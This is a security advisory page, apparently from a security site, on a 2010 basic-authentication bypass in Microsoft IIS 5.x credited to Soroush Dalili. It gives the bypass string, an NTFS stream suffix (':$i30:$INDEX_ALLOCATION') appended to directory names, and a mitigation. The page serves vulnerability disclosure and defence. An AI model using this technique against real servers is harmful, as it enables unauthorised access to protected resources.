Security Advisory
  • Microsoft Internet Information Services Basic Authentication Security Bypass Reported Date: 05-07-10
Rated Level: Critical
Impact: Security,Remotely Exploitable
Affected Software: Microsoft Internet Information Services (IIS) 5.x
Description: Soroush Dalili has discovered a vulnerability in Microsoft Internet Information Services, which can be exploited by malicious people to bypass certain security restrictions.

The vulnerability is caused due to an error in the handling of basic authentication for directories. This can be exploited to bypass authentication and access e.g. protected directories by appending the NTFS stream name and stream type (":$i30:$INDEX_ALLOCATION") to the directory name within a request.

The vulnerability is confirmed in version 5.1 on a fully-patched Windows XP SP3. Other versions may also be affected.


Note: Soroush Dalili
Solution: Do not rely on the basic authentication method to restrict access to resources.
Original Advisory: http://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/
Feedback: If you have additional information or corrections for this security advisory please contact us at advisory(at)triviasecurity.org

Security Advisories by Month (2010)
Aug (4) Jul (3) Apr (5) Mar (3) Jan (8)
TS Promotion
Proxy List
Latest Exploit Codes
TS Information
About Trivia Security
Frequently Asked Questions
TS Announcements
Terms of service
Site Map
Search
Security
Phishing Scams
Advisories
Exploits
News & Headlines
xss playground
Web Proxy
Proxy List
War Games
TS Encryption
InfoSec Library
Latest Library Articles
Video Library
Top Articles
Browse Library
Soft-Tools
Latest Tools
Top Downloads
Browse Tools Archive
Forums
Login
Register
Search
Latest Topics
Links
Affiliates
TS Top Sites
Recomended Sites